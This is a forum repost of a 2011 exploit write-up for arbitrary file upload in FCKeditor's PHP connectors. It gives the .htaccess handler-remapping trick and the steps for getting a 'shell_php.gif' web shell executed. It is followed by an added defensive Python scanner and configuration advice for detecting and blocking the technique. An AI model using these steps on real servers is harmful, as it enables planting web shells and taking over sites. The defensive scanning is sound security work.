China Network Penetration Testing Alliance

Title: FCKeditor Upload Vulnerability in All PHP Versions

Author: admin    Time: 2013-10-27 17:25
Title: FCKeditor Upload Vulnerability in All PHP Versions
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server.
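The steps above leave two artifacts in the upload directory: an .htaccess that remaps a non-PHP extension to the PHP handler, and a file whose name carries the "_php." marker that FCKeditor produces when it rewrites "x.php.gif". The following Python scanner is an added example, not code from the original post or from FCKeditor, that walks an upload folder and reports both. The directory tree, file contents and the function names `scan_upload_dir` and `build_sample_tree` are constructed for the demonstration; point `scan_upload_dir` at the real upload root (and keep `AllowOverride None` on that directory so a dropped .htaccess is ignored in the first place).

```python
# Added example (not part of the original post): defender-side scan of an
# upload directory for the two artifacts this technique leaves behind.
import os
import re
import tempfile
from pathlib import Path

# Apache directives that can change how a file is executed; any of them
# mentioning "php" inside an upload directory is a finding.
HANDLER_DIRECTIVES = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|ForceType|SetEnvIf)\b.*php",
    re.IGNORECASE | re.MULTILINE,
)
# "shell_php.gif", "a.php.jpg", "x.phtml.png": a PHP extension hidden
# before the image extension, including FCKeditor's "_php." rewrite.
SUSPICIOUS_NAME = re.compile(r"(_php\.|\.php[345]?\.|\.phtml\.|\.phar\.)", re.IGNORECASE)


def scan_upload_dir(root):
    """Return a list of (path, reason) findings found under `root`."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if name.lower() == ".htaccess":
                try:
                    text = path.read_text(errors="replace")
                except OSError:
                    text = ""
                if HANDLER_DIRECTIVES.search(text):
                    findings.append((str(path), "htaccess remaps a file pattern to the PHP handler"))
                else:
                    findings.append((str(path), "htaccess present in upload directory"))
            elif SUSPICIOUS_NAME.search(name):
                findings.append((str(path), "upload name carries a PHP extension before the image extension"))
    return findings


def build_sample_tree():
    """Create a constructed upload tree reproducing the scenario in the post."""
    root = Path(tempfile.mkdtemp(prefix="upload_scan_"))
    # The .htaccess from step 1 of the post (straight quotes, as Apache expects)
    (root / ".htaccess").write_text(
        '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
    )
    # Constructed placeholder content; only the file name matters to the scan
    (root / "shell_php.gif").write_bytes(b"GIF89a<?php echo 1; ?>")
    (root / "photo.gif").write_bytes(b"GIF89a")        # benign upload
    sub = root / "images"
    sub.mkdir()
    (sub / "logo.png").write_bytes(b"\x89PNG")         # benign upload in a subfolder
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for path, reason in scan_upload_dir(sample):
        print(f"{reason}: {path}")
```

Run it as-is to see the two findings on the constructed tree; on a real server, a finding on .htaccess should be paired with checking the Apache configuration for the upload directory, since `AllowOverride None` and `php_admin_flag engine off` (mod_php) stop the handler remapping from ever taking effect.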

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2